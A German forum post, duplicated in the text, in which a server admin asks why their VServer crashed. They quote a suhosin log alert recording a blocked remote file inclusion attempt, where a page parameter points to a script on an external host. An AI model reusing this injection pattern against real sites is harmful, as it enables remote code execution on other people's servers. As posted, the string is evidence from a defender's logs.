Lord_Icon
Member
Moin,
einer meiner VServer war heut früh down.
Die Logs waren schnell überflogen. Denn hier fanden sich massig Kernel Messages, mit den ich nicht wirklich was anfangen kann.
Komisch war, das unmittelbar vorher suhosin anscheind eine Datei includierung über die URL ???verhindet??? hat.
http://k-a.ru/img/safe1.txt???.php
Wie man oben in der safe1.txt sehen kann, möchte dieses Script reichlich viele Server Statuse auslesen. Ich würde ja mal meinen, das das Suhosin verhindert hat.
Kurz danach tauchen aber immer und immer wieder genau die gleichen Kernel Messages auf. Ein Absatz habe ich mit beigelegt.
Was ist denn hie passiert ?
einer meiner VServer war heut früh down.
Die Logs waren schnell überflogen. Denn hier fanden sich massig Kernel Messages, mit den ich nicht wirklich was anfangen kann.
Komisch war, das unmittelbar vorher suhosin anscheind eine Datei includierung über die URL ???verhindet??? hat.
http://k-a.ru/img/safe1.txt???.php
Feb 21 05:12:08 System suhosin[27857]: ALERT - Include filename ('inhalte/kontakt//?seite=http://k-a.ru/img/safe1.txt???.php') is an URL that is not allowed (attacker '89.31.140.32', file '/srv/www/htdocs/ks0183/html/de_domain/index.php', line 359)
Wie man oben in der safe1.txt sehen kann, möchte dieses Script reichlich viele Server Statuse auslesen. Ich würde ja mal meinen, das das Suhosin verhindert hat.
Kurz danach tauchen aber immer und immer wieder genau die gleichen Kernel Messages auf. Ein Absatz habe ich mit beigelegt.
Was ist denn hie passiert ?